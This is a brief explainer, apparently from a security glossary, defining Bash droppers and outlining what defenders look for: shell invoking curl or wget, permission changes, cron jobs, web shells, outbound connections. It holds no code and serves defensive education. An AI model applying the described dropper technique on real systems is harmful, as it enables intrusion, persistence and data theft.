A Bash dropper is a shell script used as the first step in an attack chain. Instead of doing all the malicious work itself, it runs additional commands, downloads payloads, decodes embedded data, or launches other scripts and binaries. Because Bash is built into many Linux and Unix systems, attackers can abuse it to execute code quickly without needing a custom installer.
This matters in cyber security because droppers help adversaries move from initial access to persistence, remote control, or data theft while keeping the visible script small. In real incidents, defenders may see Bash invoking tools such as curl or wget, changing file permissions, writing cron jobs, or spawning web shells and backdoors. Detection focuses on unexpected shell execution, unusual child processes, outbound connections, and file changes in temporary or web-accessible directories. Removing the first script is not enough if the dropper already staged later payloads elsewhere.